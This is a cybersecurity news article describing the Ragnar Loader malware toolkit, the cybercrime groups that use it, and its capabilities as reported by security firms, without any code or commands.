In the ever-evolving landscape of cybersecurity threats, a new player has emerged that underscores the complexity and sophistication of modern malware: Ragnar Loader. Investigations into this malware toolkit, led by threat hunters, reveal its extensive use by several notorious cybercrime groups, including Ragnar Locker, FIN7, FIN8, and Ruthless Mantis (formerly known as REvil).
According to Swiss cybersecurity firm PRODAFT, Ragnar Loader serves as a vital instrument for attackers, granting them prolonged access to compromised networks. This facilitates extensive operations over time, making it a cornerstone of their malicious efforts. Although primarily associated with the Ragnar Locker group, there’s ambiguity regarding whether they developed this toolkit or merely lease it out to other entities.
Originally documented in August 2021 by Bitdefender, Ragnar Loader was linked to a failed attack by the FIN8 group against an unidentified financial institution in the U.S. Remarkably, its utilization dates back to at least 2020, signifying its place in the annals of persistent cybersecurity threats.
In July 2023, Symantec, now part of Broadcom, highlighted an updated version of Ragnar Loader being employed by FIN8 for delivering the now-disbanded BlackCat ransomware. This shows how the toolkit adapts to contemporary security challenges while maintaining its core functionality.
Central to Ragnar Loader’s effectiveness is its ability to secure long-term footholds in targeted environments. This is made possible through a suite of advanced techniques designed to evade detection and enhance operational durability. For instance, PowerShell-based payloads execute its commands, while robust encryption methods, including RC4 and Base64, are employed to obscure its actions. The malware also utilizes sophisticated process injection strategies, facilitating stealthy control over infected systems.
PRODAFT’s analysis suggests that these capabilities collectively bolster Ragnar Loader’s resilience against cybersecurity measures, allowing it to persist in infiltrated environments.
The malware is distributed to affiliate groups as a comprehensive package, complete with various components to facilitate reverse shell access, local privilege escalation, and remote desktop access. It also enables attackers to maintain communications with their command-and-control (C2) panel, affording them remote control over infected machines.
Typically activated on victim systems via PowerShell, Ragnar Loader incorporates a multitude of anti-analysis techniques to maintain its stealth and obfuscate control flow logic. This arsenal enhances its ability to evade detection by standard cybersecurity measures.
Additionally, Ragnar Loader allows for a range of backdoor operations, employing DLL plugins and shellcode to manipulate the victim’s environment. Notably, it can read and exfiltrate data from arbitrary files, which is critical for lateral movement within a compromised network using PowerShell-based pivoting techniques.
Another significant aspect of this toolkit is its inclusion of a Linux executable file named “bc”. This component facilitates remote connections, enabling attackers to execute command-line instructions directly on the compromised system. PRODAFT notes that this is akin to BackConnect modules found in prominent malware families like QakBot and IcedID, illustrating a common and formidable tactic among cybercriminals aimed at enterprise targets.
The adaptability and complexity of Ragnar Loader are highlighted through its employment of advanced obfuscation, encryption, and anti-analysis techniques. These attributes encompass a range of tactics including PowerShell payloads, RC4 and Base64 decryption routines, dynamic process injection, token manipulation, and lateral movement capabilities. Taken together, they exemplify the increasing sophistication and adaptability in the realm of modern ransomware operations.